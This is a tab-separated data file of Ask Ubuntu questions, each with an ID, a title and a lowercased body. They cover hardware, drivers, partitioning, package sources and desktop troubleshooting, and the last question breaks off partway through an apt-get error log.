345319	64 bit ubuntu for hp proliant dl160 g6 server ?	does this 32 bit ubuntu download mean that i can install only 32 bit ubuntu on my hp proliant dl160 g6 which has the intel xeon l5520 processor that handles both 64/32bit ? i would like to take advantage of the 64bit processing power . do i have to settle for this 32bit ubuntu or has anyone been successful in running any other 64bit versions for proliant dl160/intel xeon l5520 ? thanks in advance for any pointers .
345321	my ubuntu macbook pro feels warm , can i solve this ?	i 've installed ubuntu 13.04 in a partition on my macbook pro ( mc724ll/a ) , it runs well , i 've also installed jupiter , mbpfan , intel linux graphics installer and updated the drivers . i 'm booting with refind , installed in the os x partition ( so to avoid the infamous 30s boot delay ) . this is the stabilized os x temperature report , while just navigating with chrome : this is what i get from ubuntu just upon start : but this is what i get stabilized after using the system for some time : the sad part for me is that , differently from os x , now i aways feel the machine warm , even idle . it 's not burning , but i feel my hands siting over something that 's aways warm , that 's not right ( i recall very old notebook models which i used that aways felt warm ) , on os x , i would feel such only when doing intensive tasks . by the way , i 'm not with fans running loud or something like that , just the temperature that is above , and they run loud as usual , when i start steam to play some game = ) any tip on how to solve this , if possible ? i think i 've described all the software i 've installed that could help with this , but none helped much ... update 1 well , my last change was to enable efi mode . i must do some more tests , i 'm running it from battery and i think it got a good enough temperature . when running plugged to the energy source i think temperature elevates . update 2 i think it 's better after enabling efi mode , maybe i ca n't get better than this , the only thing left that comes to my mind is undervolting .
345323	how can i create an x server that has a backing store ?	so i am completely new to ubuntu ( i am running 12.04 on a toshiba satellite ) . i am trying to remotely access my work computer but i keep getting an error reading : '' xevas : requires a x server that has a backing store '' i have read several post that say i should create a file called /etc/x11/xorg.conf and put this in it : section `` device '' option `` backingstore '' `` true '' endsection the thing is , i have no idea how to execute this script and i 'm not even sure i created the file properly . i am also not able to assign myself as root so i have been trying to run everything through sudo . could someone give me detailed instruction on how to set this up ? this is the only bash scripting i really need , i can get around most other shells through sheer memorization . thanks
345324	my admin account	i installed ubuntu 12.04 on my toshiba laptop . everything was fine until i downloaded compiz and started messing with it . i ended up with just my wallpaper on the screen and nothing else . so i rebooted and logged into the guest account , made it an admin account and deleted my other admin account . i then proceeded to set up another admin acount with full name = ( my name ) , account name `` i think or something like that '' = the account name , and that was it no password option just login auto = on ... logged into the account and tried to download something but it asked for my password . i tried several times but nothing worked . so then i tried to change it in the root shell with ; passwd -d myaccount and got this error : can not lock /etc/shadow ; try again later . i tried all of the options and got the same error every time . can someone please help ? i do n't want to have to start over from scratch ...
345325	flickering/flashing screen problem related to keyboard	this will seems quite bizarre but that 's a huge problem for me , i 'm facing it for a long time since ubuntu 12.04 . my ubuntu/linux mint/debian ( unity/gnome ) always starts flickering after using the computer for a while , i always thought this had something to do with the video board . i have an vostro 3550 ( radeon 6xxx/intel onboard ) . first i realized that when i was navigating trough an website , when i selected with the mouse a combo , the combo closed it self automatically then the screen starts flickering . the i realized when i was trying to make the login in the terminal ( crtl + alt + f1 ) a strange character appears , like : ^ @ repeatedly . when i keep crtl pressed the system never flickers ! i have absolutely no problem using windows . what can i do ? there is no such thing as keyboard driver on dell support . i would love to use ubuntu only , but this is very annoying . problem happens on ubuntu 12.04 , .10 and 13.04 linux mint 15 ( cinnamon ) debian live with gnome
345326	how do i eliminate white noise in zynaddsubfx ?	how do you eliminate white noise in zynaddsubfx ? i am using the synthesizer with a midi program and qjackctl . it works , but there is some noise in the background . does anyone know how to fix this ?
345328	can the 'cat ' command be used to concatenate or merge multiple vcf files into one ?	will doing so overwrite my original files ?
345330	ctrl key closes apps in newly installed ubuntu 13.04	as soon as i press ctrl , poof goes whatever i 'm doing . it 's only happening with 13.04 . i had lubuntu 13.04 before , ubuntu 12.04 before that , and windows xp came with the original install in this hp mini 100 . i did not give the ctrl key any special privileges and tried to see if it had any shortcut assigned but i have found nothing . the main problem is i can not use any shortcut because the window will close . any help to change that behaviour before i decide to downgrade to 12.04 ?
345331	mountpoints , file permissions	i have an application that writes to /var/lib/yacy . i have a partition i want to use for that database . i have the partition mounted in fstab at /home/somwhere/partition i want to move the current contents of the /var/lib/yacy into the mounted partition then change the fstab to point that device to /var/lib/yacy . how do i do this maintaining permissions and not breaking anything ?
345333	13.04 does n't boot after installing nvidia driver 319.49	so i install this new driver because i wanted access to cuda . now , the only thing my computer does when booting is going to a black screen with an underscore flashing on the top-left corner . before that point , i see rapidly the tty login screen but i do n't have time to log there . any ideas what i should do about that ? thanks in advance guys !
345343	gparted - `` unable to satisfy all constraints on the partition ''	ok , so i 'm kind of new to linux , but i know computers very well so i can take commands . my problem is when i tried to expand my extended partition that houses my ubuntu partition i get an error saying `` unable to satisfy all constrains on the partition '' it is important that i get the problem fixed asap . i do n't know what exactly you need to know to fix my problem , but here are a few things and do n't be afraid to ask for more of what you need . tried to partition with gparted in an ubuntu live usb ( ubuntu live 13.04 x64 ) . my partition map looks like this : partition : size : /dev/sda1 | toshiba system volume | 1.46 gib /dev/sda2 | windows 7 | 104.08 gib unallocated | the space i want to add | 99.21 gib á /dev/sda3 | the extended partition | 81.06 gib /dev/sda5 | my ubuntu partition | 81.06 gib unallocated | extra space added in ubuntu installation | 2.00 mib /dev/sda4 | hddrecovery | 12.27 gib output from sudo fdisk -l disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xcd9fd9b7 device | boot | start | end | blocks | id | system /dev/sda1 | * | 2048 | 3074047 | 1536000 | 27 | hidden ntfs winre /dev/sda2 | | 9893888 | 221351935 | 105729024 | 7 | hpfs/ntfs/exfat /dev/sda3 | | 429400062 | 599398399 | 84999169 | f | w95 ext 'd ( lba ) /dev/sda4 | | 599402496 | 625141759 | 12869632 | 17 | hidden hpfs/ntfs /dev/sda5 | | 429400064 | 599398399 | 84999168 | 83 | linux disk /dev/sdb : 32.0 gb , 32015679488 bytes 255 heads , 63 sectors/track , 3892 cylinders , total 62530624 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00093c4b device | boot | start | end | blocks | id | system /dev/sdb1 | * | 32 | 62527487 | 31263728 | c | w95 fat32 ( lba ) the error i am getting in gparted gparted 0.12.1 -- enable-libparted-dmraid libparted 2.3 move /dev/sda3 to the left and grow it from 81.06 gib to 82.20 gib 00:00:02 ( error ) calibrate /dev/sda3 00:00:02 ( success ) path : /dev/sda3 start : 429,400,062 end : 599,398,399 size : 169,998,338 ( 81.06 gib ) move partition to the left and grow it from 81.06 gib to 82.20 gib 00:00:00 ( error ) old start : 429,400,062 old end : 599,398,399 old size : 169,998,338 ( 81.06 gib ) requested start : 427,008,000 requested end : 599,396,351 requested size : 172,388,352 ( 82.20 gib ) libparted messages ( info ) unable to satisfy all constraints on the partition . ======================================== again if there is any other info you need just ask , it is important that i can fix the problem . i am working on making my own linux distro to learn more about linux , and who does n't want their own os ? i mean come on . i will try with the windows partition manager but i expect no better . thank you !
345344	where are the logs for my user-data script ? cloud-init	if i paste a shell script into the user-data box when starting the standard ubuntu ami on ec2 , i 'm using cloud-init , am i not ? my question is where does it log the output of such a script ? do i have to do something to turn logging on ? i ca n't find logs for it anywhere . ubuntu-raring-13.04-amd64-server-20130423 ( ami-c30360aa ) thanks !
345347	installing libpng1.5.15 for stepmania ?	i 'm trying to install stepmania on here , following these instructions : http : //ubuntuforums.org/showthread.php ? t=2138685 . for some reason , i 'm having trouble installing/updating libpng . i downloaded the .tar.gz file to downloads and extracted it there . i entered the cd downloads/libpng-1.5.15 command in the terminal . when i enter the next one , though ( ./configure âprefix=user/local/libpng ) , i get an error message that says : ./configure -- prefix=usr/local/libpng : no such file or directory i tried going to /usr/local/ and creating a folder called libpng , but it did n't help . any ideas ?
345349	ca n't get wired or wireless networking to work	just installed it today ubuntu on a dell inspiron 1521 laptop . everything seemed to go ok , but now i ca n't get either wired or wireless internet connections to work . i have a cisco linksys e3200 router . it just keeps showing `` no network devices available '' . both wired and wireless were working fine before under windows . more information : tomtullis @ tomtullis-inspiron-1521 : ~ $ lspci -nn | grep 02 00:00.0 host bridge [ 0600 ] : advanced micro devices [ amd ] nee ati rs690 host bridge [ 1002:7910 ] 00:01.0 pci bridge [ 0604 ] : advanced micro devices [ amd ] nee ati rs690 pci to pci bridge ( internal gfx ) [ 1002:7912 ] 00:05.0 pci bridge [ 0604 ] : advanced micro devices [ amd ] nee ati rs690 pci to pci bridge ( pci express port 1 ) [ 1002:7915 ] 00:07.0 pci bridge [ 0604 ] : advanced micro devices [ amd ] nee ati rs690 pci to pci bridge ( pci express port 3 ) [ 1002:7917 ] 00:12.0 sata controller [ 0106 ] : advanced micro devices [ amd ] nee ati sb600 non-raid-5 sata [ 1002:4380 ] 00:13.0 usb controller [ 0c03 ] : advanced micro devices [ amd ] nee ati sb600 usb ( ohci0 ) [ 1002:4387 ] 00:13.1 usb controller [ 0c03 ] : advanced micro devices [ amd ] nee ati sb600 usb ( ohci1 ) [ 1002:4388 ] 00:13.2 usb controller [ 0c03 ] : advanced micro devices [ amd ] nee ati sb600 usb ( ohci2 ) [ 1002:4389 ] 00:13.3 usb controller [ 0c03 ] : advanced micro devices [ amd ] nee ati sb600 usb ( ohci3 ) [ 1002:438a ] 00:13.4 usb controller [ 0c03 ] : advanced micro devices [ amd ] nee ati sb600 usb ( ohci4 ) [ 1002:438b ] 00:13.5 usb controller [ 0c03 ] : advanced micro devices [ amd ] nee ati sb600 usb controller ( ehci ) [ 1002:4386 ] 00:14.0 smbus [ 0c05 ] : advanced micro devices [ amd ] nee ati sbx00 smbus controller [ 1002:4385 ] ( rev 14 ) 00:14.1 ide interface [ 0101 ] : advanced micro devices [ amd ] nee ati sb600 ide [ 1002:438c ] 00:14.2 audio device [ 0403 ] : advanced micro devices [ amd ] nee ati sbx00 azalia ( intel hda ) [ 1002:4383 ] 00:14.3 isa bridge [ 0601 ] : advanced micro devices [ amd ] nee ati sb600 pci to lpc bridge [ 1002:438d ] 00:14.4 pci bridge [ 0604 ] : advanced micro devices [ amd ] nee ati sbx00 pci to pci bridge [ 1002:4384 ] 00:18.0 host bridge [ 0600 ] : advanced micro devices [ amd ] k8 [ athlon64/opteron ] hypertransport technology configuration [ 1022:1100 ] 00:18.1 host bridge [ 0600 ] : advanced micro devices [ amd ] k8 [ athlon64/opteron ] address map [ 1022:1101 ] 00:18.2 host bridge [ 0600 ] : advanced micro devices [ amd ] k8 [ athlon64/opteron ] dram controller [ 1022:1102 ] 00:18.3 host bridge [ 0600 ] : advanced micro devices [ amd ] k8 [ athlon64/opteron ] miscellaneous control [ 1022:1103 ] 01:05.0 vga compatible controller [ 0300 ] : advanced micro devices [ amd ] nee ati rs690m [ radeon x1200 series ] [ 1002:791f ] 03:00.0 ethernet controller [ 0200 ] : broadcom corporation bcm4401-b0 100base-tx [ 14e4:170c ] ( rev 02 ) 0b:00.0 network controller [ 0280 ] : broadcom corporation bcm4311 802.11a/b/g [ 14e4:4312 ] ( rev 01 ) tomtullis @ tomtullis-inspiron-1521 : ~ $ sudo lshw -c network [ sudo ] password for tomtullis : *-network unclaimed description : network controller product : bcm4311 802.11a/b/g vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:0b:00.0 version : 01 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : fe8fc000-fe8fffff *-network unclaimed description : ethernet controller product : bcm4401-b0 100base-tx vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:03:00.0 version : 02 width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list configuration : latency=64 resources : memory : fe5fe000-fe5fffff sorry , i 'm afraid none of that means anything to me ! thanks for your help !
345355	'xinput list ' shows same device twice & device ids change : how to use 'set-prop ' in a script ?	for some reason logitech 's usb receiver shows up twice in xinput list device list : logitech usb receiver id=13 [ slave pointer ( 2 ) ] logitech usb receiver id=14 [ slave pointer ( 2 ) ] when i try to xinput set-prop `` logitech usb receiver '' `` somesetting '' n , i of course get : warning : there are multiple devices matching 'logitech usb receiver ' . to ensure the correct one is selected , please use the device id , or prefix the device name with 'pointer : ' or 'keyboard : ' as appropriate . unable to find device logitech usb receiver the prefix does n't help as it is the same device ( pointer ) . i can use the id instead , but the problem is that the id of course changes between startups , so i ca n't makes this automatic ( simple script that on startup sets sensitivies for all my pointing decvices ) . so , is it possible to remove the duplicate device , make xinput ignore it or still refer to the device by it 's name ? if neither of these are possible , then i guess a script would have figure out the ids ( and from those , it seems to be always the smaller one ) . the commands i want to use are : xinput set-prop n `` device accel constant deceleration '' 2.4 xinput set-prop n `` device accel velocity scaling '' 1
345357	shell script to display ip	how can i create a shell script which receives a vector argument like ./script.sh google.com , yahoo.com and display ip for each domain like google.com 100.23.123.13 edit : # ! /bin/bash while [ `` $ 1 '' ] ; do host $ 1 | grep address | head -1 done
345358	how can i move or arrange gnome shell extensions in the top bar ?	http : //i.stack.imgur.com/bauau.png my question regards the icons in the top right corner gpaste system monitor transmission indicator etc how can i arrange them in my own order , i want all the icons most right and i want the system monitor and uptime indicator next to them on the left side of those icons is there a easy way to move or arrange them if not what is the hard way to move them i know its a small thing but it bugs the hell out of me i bet there are more people who have this problem maybe its an idea to make it a default function in gnome tweak tool or if some hero made an extension for it i looked all over ddg google and ask ubuntu couldnt find anything thanks in advance greetz danny oh and i use ubuntu gnome 13.10 shell version is 3.8.4
345360	problems with codeblocks on ubuntu	on my ubuntu 12.04 , i am using codeblocks 12.11 ( rev 8629 ) to code in c using sdl and some other multimedia libraries . codeblocks is giving me a very tough time . it has so many bugs . i searched everywhere for some newer version which has atleast some of the bugs fixed . but i could n't find any . also all the nightly builds are given as only for windows . where can i find a less buggy version ? ( by bugs , i mean , even after saving the perspectives , they do n't show up on the next start of the ide . same goes with compiler settings . debugging is a mess , due to the above reasons and number of such small issues . ) if there exists one , can you please provide me with the link and procedure to install it ? are there nightly builds for ubuntu ? how can i use them ? my present version has a lot of plugins installed and is really huge . i prefer not to delete it . is there any way those bugs can be fixed ? are any patches available ?
345362	manual cloning of a mutli partition gpt disk to smaller target	ok so i have a asus laptop that came with 2x 128 gb ssd and its setup as a raid 0 totaling 256 gb . the first 4 partitions are the important ones . i assembled the raid with mdadm and cloned the entire thing with dd to a file as a backup . my plan is to break the raid after the clone is done , and dd back the first 4 partitions onto the first 128 gb disk , and resize the 4th os partition to take up the remaining space . my exact question is how do i handle the gpt partition table with gdisk ? do i need to worry about that at all ? model : linux device-mapper ( striped ) ( dm ) disk /dev/mapper/isw_ccjcaiibej_asus_os : 256gb sector size ( logical/physical ) : 512b/512b partition table : gpt number start end size file system name flags 1 1049kb 106mb 105mb fat32 efi system partition boot 2 106mb 1050mb 944mb ntfs basic data partition hidden , diag 3 1050mb 1184mb 134mb microsoft reserved partition msftres 4 1184mb 104gb 102gb ntfs basic data partition ( os ) 5 104gb 235gb 131gb ntfs basic data partition ( data1 ) 6 235gb 256gb 21.5gb ntfs basic data partition ( data2 ) hidden , diag
345363	methods for creating good admin documentation ?	i want to document any change i do to my ubuntu system . i want to do this in a way that if i had to pass this system to another administrator , it would be easy and logical for him to access this documentation and use it for any purpose . the main reason that i want to do this is so i can look back and see exaclly what 's done to solve a problem and so on . what would be the best way to do this ? i am thinking placement of the documentation files and methods of creating and viewing them easily . another reason i want to learn good documentation is that one of the lpic-1 books says this is very importaint , but does not elaborate much on the subject . hope this question was'nt to distro independent or unclear . update : ( have made some ideas and more thoughts on the subject ) i 've got a dell inspiron 1564 with bcm4312 wireless card on which the broadcom sta/wl driver caused kernel panic . i do not remember everything i tried to fix it , and i do not remember how exaclly i fixed the problem . i also have problems with my new driver , and i miss not having documented this locally . what i want , is a folder which contains both documentation on what has been done , what is installed on the system and also perhaps howtos for new desktop users . i want a pager , like less to display these files , and i want to use a good location to store them . ( usr/share/doc ? ) this is in addition to commenting in config files and scripts . i altso want to create a function that lists all the documentation . i think i need to write a script , with options to create , print and list my doc files . am i on the right track at all here ? i reckon it is not actually necessary to write a script for this , but i think it might be good learning , anyways . i am thinking something simple like this : docfile list # to list all doc files and howto files . docfile -n or filename.howto # create new/edit file doc tile docfile # view file in pager like less yeah , i 've got some time on my hands at the moment.. : ) to cut the question to the bone : i want a simple and elegant way to create and print documentation locally . is the suggestion above ( a script ) a reasonable way to solve this ? and where should i place these files ? is /usr/source/doc/docfiles the place to save them ?
345367	ubuntu 13.04 causing overheating and battery drain	i have a samsung chronos 7 1tb , 2.2ghz , 6gb ram and i recently installed ubuntu because i wanted to get rid of windows . everything has gone good until i noticed a significant battery drain and overheating . when i click on `` about this computer '' it shows i have an intel sandybridge mobile graphics card . i 've tried installing the latest amd and it installed correctly but it disabled unity so i went back to the one i was using before . if anyone could please give me tips or link to another forum with an answer that 'd be great ! i love ubuntu but i ca n't get used to this 1.5 hour battery life as opposed to the 4 hours i got with windows 7 and i 'm not going back to windows
345370	qml : textarea within the listitem elemtn on listview does not have scroll bar and text area contents are lost	i am having a textarea within the listitem element and i have fixed the textarea height . when the listview is displayed , textarea within each row , does not have a scroll . hence textarea shows possible content within its height and rest of the contents is lost . please find the snippet of custom listitem element . item { id : orderrow width : parent.width height : units.gu ( 25 ) property alias tabletext : tabledetailstext.text property alias ordertext : orderdetailstext.text signal yesconfirmation ( ) rectangle { id : ordercompleterect width : parent.width/5 height : parent.height anchors.left : parent.left anchors.top : parent.top image { source : `` icons/bg.png '' width : parent.width height : parent.height anchors.fill : parent } button { id : orderservedbtn anchors.centerin : parent width : parent.width height : units.gu ( 5 ) text : `` order complete '' onclicked : { popuputils.open ( dialog , orderrow ) } } } rectangle { id : orderdetailsmainrect width : parent.width - ordercompleterect.width height : parent.height anchors.left : ordercompleterect.right anchors.top : parent.top image { source : `` icons/bg.png '' width : parent.width height : parent.height anchors.fill : parent } rectangle { id : tabledetailsrect height : parent.height width : parent.width/3 anchors.left : parent.left anchors.top : parent.top enabled : false border.color : `` black '' image { source : `` icons/bg.png '' width : parent.width height : parent.height anchors.fill : parent } textarea { id : tabledetailstext width : parent.width height : parent.height highlighted : true font.pointsize : 15 font.bold : true font.family : `` verdana '' color : `` black '' } } rectangle { id : orderdetailsrect height : parent.height width : parent.width - tabledetailsrect.width anchors.left : tabledetailsrect.right anchors.top : parent.top enabled : false image { source : `` icons/bg.png '' width : parent.width height : parent.height anchors.fill : parent } textarea { id : orderdetailstext width : parent.width height : parent.height highlighted : true font.pointsize : 15 font.bold : true font.family : `` verdana '' color : `` black '' } } } }
345374	my gnome icon disappeared	i am a newbie ubuntu 13.04 user.from the terminal i was trying to kill a process , so i entered su sudo , kill -15 -1 . now i am not able to use the gnome.and in tty2 my sudo password is not working . please help . thanks .
345377	only native resolution when manually selecting grub	i recently installed ubuntu gnome edition 13.04 on my samsung np370r5e-a03nl . installation went fine ( i just resized the windows 8 system partition and installed it manually there ) , but i still have a problem with grub . when i just press the power button , grub will show up in low resolution ( i guess 800x600 ) . when i manually choose the 'ubuntu ' boot entry , i get my native resolution ( 1366x768 ) . please note that i am using secure boot , that my laptop has two ubuntu boot menu entries where the latter does not support secure boot and that ubuntu itself successfully sets the native resolution .
345382	file systems and image properties	the other day i went to print my photograph from usb drive . the image is a jpeg file . i copied it to the usb drive which was formatted in fat-32 format . i did n't realized this and proceeded with the copying . the target is a windows machine . i was surprised to know that the windows machine was unable to recognize my photo ( jpeg ) which is well usable in my ubuntu box . i returned home and later did the same copy operation in windows os which i was dual dual booting with ubuntu . voila ! ! ! windows cautioned me `` do you want to copy the file without its properties ? '' . i was pleased to know that at least windows prompts this message . i later formatted my pen drive to ntfs and things are fine . i 'm not sure how the copy operation would result in ubuntu with ntfs as the option . i 'm guessing that the copied file ( my jpeg based photo ) would still be usable and recognizable if the target pc is a linux ... my question is how to prevent such awkward situations while still using linux ( ubuntu ) ? how to know beforehand that these situations might arise ? thanks in advance
345384	resizing encrypted partitions	i have an ubuntu 13.04 desktop with full disk encryption . i have booted up a live cd and can see two partitions /dev/sda1 ( boot ) and /dev/sda2 the harddrive . can i lower the space of /dev/sda2 so i can increase the size of boot without messing it up ?
345388	ubuntu for windows phone	can i somehow install ubuntu on my nokia lumia 800 , which is windows phone ? i am tired of windows os of my nokia , ubuntu seems much better to so i was wondering if installation on my device is possible . windows version of my phone is 7.8 .
345391	ubuntu freezes frequently giving error : gen6_rp_interrupt_limits	my computer freezes allmost every day . sometimes just compiz crashes when i try to open unity menu . very often screen just freezes completely and does n't respond anything . then i have to restart x . every time i put my computer standby mode or wake it up i get following error : kernel : [ 271.043895 ] [ drm : gen6_sanitize_pm ] *error* power management discrepancy : gen6_rp_interrupt_limits expected 16000000 , was 12060000 i tried to google the error and i found that updating kernel would help . i tried to install suggested kernel 3.6 and also kernel 3.4 . with both kernels standy mode does n't work at all so i had to switch back to 3.2.0-53-generic . my os is ubuntu 12.04 lts how could i fix this very anoying problem ? here is asked information : tapio @ aspire-3830t : ~ $ sudo lspci | grep vga 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) tapio @ aspire-3830t : ~ $ sudo uname -a linux aspire-3830t 3.2.0-53-generic # 81-ubuntu smp thu aug 22 21:01:03 utc 2013 x86_64 x86_64 x86_64 gnu/linux tapio @ aspire-3830t : ~ $ sudo lsb_release -a lsb version : core-2.0-amd64 : core-2.0-noarch : core-3.0-amd64 : core-3.0-noarch : core-3.1-amd64 : core-3.1-noarch : core-3.2-amd64 : core-3.2-noarch : core-4.0-amd64 : core-4.0-noarch distributor id : ubuntu description : ubuntu 12.04.3 lts release : 12.04 codename : precise tapio @ aspire-3830t : ~ $ sudo dpkg -l | grep xserver-xorg-video-intel ii xserver-xorg-video-intel 2:2.19.0-0ubuntu1~xup1 x.org x server -- intel i8xx , i9xx display driver
345392	enabling hibernation - does n't work at all , althouth it should	i did all of what people suggested me to do in this question how to enable hibernation ? yet it does n't work , although the menu item appeared and the test showed that my laptop supports hibernation . it simply does n't hibernate when i press the menu item of `` hibernate '' , it seems like it 's going to because wifi turns off for a little while , but then it turns on again . so how do i do that in ubuntu 13.04 ?
345393	very low brightness in setup	my screen is in very low brightness during setup , and can barley see using a torch . im new to ubuntu and using 13.04 so please make it simple thanks . laptop : acer aspire 5336 model : pew72 shared graphics intel celeron cpu thanx really need help as my windows is stuffed up .
345395	wine installation in ubuntu12.10	i am using ubuntu12.10 and installed wine 1.5 but when i am using ultra surf it is showing an error `` ca n't find mfc42.dll '' i have just copy from windows 7 this file but its not working . how to remove this problem ?
345399	steam does not start , various errors and warnings involved	i was running steam fine and i got an update of the client . after i applied it , steam was not starting any more and i get these warnings and errors : axel @ desktop-axel-ubuntu : ~ $ steam running steam on ubuntu 13.04 64-bit steam_runtime is enabled automatically installing breakpad exception handler for appid ( steam ) /version ( 1379035603_client ) installing breakpad exception handler for appid ( steam ) /version ( 1379035603_client ) installing breakpad exception handler for appid ( steam ) /version ( 1379035603_client ) unlinked 0 orphaned pipes removing stale semaphore last operated on by process 21580 with name 0eblobregistrymutex_dedfd5af95d03c2232c7707e9714d78f removing stale semaphore last operated on by process 21580 with name 0eblobregistrysignal_dedfd5af95d03c2232c7707e9714d78f removing stale semaphore last operated on by process 21580 with name 0emsteamengineinstance removing stale semaphore last operated on by process 21580 with name 0esteamenginelock gtk-message : failed to load module `` overlay-scrollbar '' ( steam:22158 ) : gtk-warning ** : impossible de trouver le moteur de thème dans module_path : « adwaita » ( steam:22158 ) : gtk-warning ** : impossible de trouver le moteur de thème dans module_path : « adwaita » /usr/share/themes/adwaita/gtk-2.0/gtkrc:1137 : error : unexpected identifier `direction ' , expected character ` } ' installing breakpad exception handler for appid ( steam ) /version ( 1379035603_client ) fontconfig error : `` /etc/fonts/conf.d/10-scale-bitmap-fonts.conf '' , line 70 : non-double matrix element fontconfig error : `` /etc/fonts/conf.d/10-scale-bitmap-fonts.conf '' , line 70 : non-double matrix element fontconfig warning : `` /etc/fonts/conf.d/10-scale-bitmap-fonts.conf '' , line 78 : saw unknown , expected number [ 0914/113555 : warning : proxy_service.cc ( 958 ) ] pac support disabled because there is no system implementation i have ia32-libs installed and running 3.8.0-30-generic x86_64 .
345401	authentication for my google account	i 've tried fixing something and made things worse ... ! i tried to set up evolution with my google account to receive email . it did n't work immediately , which i put down to using two-factor authentication on the account . i found some instructions somewhere to open seahorse and remove a key , which seems to have exacerbated the situation as now i am prompted for my google password every time i open the dash and begin typing . i am also asked for the password when i log on . i 'm assuming that this is to do with having removed a wrong key . please can someone help me put it right ? edit : i asked this question 10 days ago and have been trying to figure out what i 've done wrong since , but not had any luck . at this stage i 'm on the verge of re-installing the os , which seems like overkill . i 'm happy to provide more info to get this resolved but i do n't know what info would be needed or how to get it . please help !
345402	wireless problem on new laptop	so yesterday i installed ubuntu on my new laptop and the enable wifi option was greyed out . i searched for a solution via my pc and the only thing i could find was the command rfkill unblock all . tried it , but it didnt work . tried a lot of combinations with block and unblock certain devices , but none worked . so i just got fed up with it and stuck the ethernet cable in the laptop and all of a sudden , enable wifi was not greyed out anymore and i did n't have to use the ethernet cable . downloaded and installed the updates after that and restarted and when ubuntu loaded , the enable wifi option was greyed out again . oh yeah , it says that hardware switch is blocking the wifi from connecting but there is no physical switch and the fn+f2 ( wireless ) is enabled . so , please , help ! ! !
345405	how to share packages with other ubuntu systems ?	i have a host ubuntu 13.10 system in which i am installing packages via apt-get install now there are many virtual machines which run on top of this host machine . i want these virtual machines to install from already downloaded packages by the host machine and skip going to the internet first to save my time . i know i can create a local apt-mirror and copy a full ubuntu repo to my host machine , but i do n't want all of those packages . i want to share only which i need and i want to download only once in my host machine .
345409	is there a software for ubuntu equivalent to hashtab for windows ?	i use hashtab in windows to know the hash of a file . all i have to do is right click on the file , click properties and in the properties menu there would be a tab called hash and it has the hash of the file in different formats like md5 , sha-1 etc . is there something like that for ubuntu ?
345412	installing huawei e3131 on ubuntu 12.04	i am running ubuntu 12.04 . i have tried to install huawei e3131 internet manager . ubuntu detects installation folder , but when i try to run `` setup '' or `` autorun '' it shows a message with title `` extraction failed '' or something like that . do i need to install some extra drivers or something else ? i am completely new to ubuntu , and i would be grateful if i get a specific answer from you .
345418	how do i fix duplicate entries in sources.list ?	ok so i have tried everything under the sun but ca n't get into my sources.list to fix the duplicate and i think that 's why my software center is n't working as well . this is what i get when i do /etc/apt/sources.list christina @ owner-laptop : ~ $ /etc/apt/sources.list bash : /etc/apt/sources.list : permission denied christina @ owner-laptop : ~ $ then , when i do sudo apt-get update , this is what i get : christina @ owner-laptop : ~ $ sudo apt-get update ign http : //us.old-releases.ubuntu.com precise inrelease ign http : //us.old-releases.ubuntu.com precise-updates inrelease ign http : //us.old-releases.ubuntu.com karmic-backports inrelease err http : //us.old-releases.ubuntu.com precise release.gpg something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //us.old-releases.ubuntu.com precise-updates release.gpg something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //us.old-releases.ubuntu.com karmic-backports release.gpg something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) ign http : //us.old-releases.ubuntu.com precise release ign http : //us.old-releases.ubuntu.com precise-updates release ign http : //us.old-releases.ubuntu.com karmic-backports release ign http : //dl.google.com stable inrelease hit http : //dl.google.com stable release.gpg ign http : //security.ubuntu.com precise-security inrelease ign http : //archive.canonical.com karmic inrelease hit http : //dl.google.com stable release hit http : //security.ubuntu.com precise-security release.gpg hit http : //dl.google.com stable/main i386 packages ign http : //archive.canonical.com precise inrelease err http : //us.old-releases.ubuntu.com precise/main sources something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //us.old-releases.ubuntu.com precise/restricted sources something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //us.old-releases.ubuntu.com precise/universe sources something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //us.old-releases.ubuntu.com precise/multiverse sources something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //us.old-releases.ubuntu.com precise/main i386 packages something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) hit http : //security.ubuntu.com precise-security release err http : //us.old-releases.ubuntu.com precise/restricted i386 packages something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //us.old-releases.ubuntu.com precise/universe i386 packages something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //us.old-releases.ubuntu.com precise/multiverse i386 packages something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //us.old-releases.ubuntu.com precise/main translation-en_us something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //us.old-releases.ubuntu.com precise/main translation-en something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //us.old-releases.ubuntu.com precise/multiverse translation-en_us something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //us.old-releases.ubuntu.com precise/multiverse translation-en something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //us.old-releases.ubuntu.com precise/restricted translation-en_us something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //us.old-releases.ubuntu.com precise/restricted translation-en something wicked happened resolving 'us.old-releases.ubuntu.com : 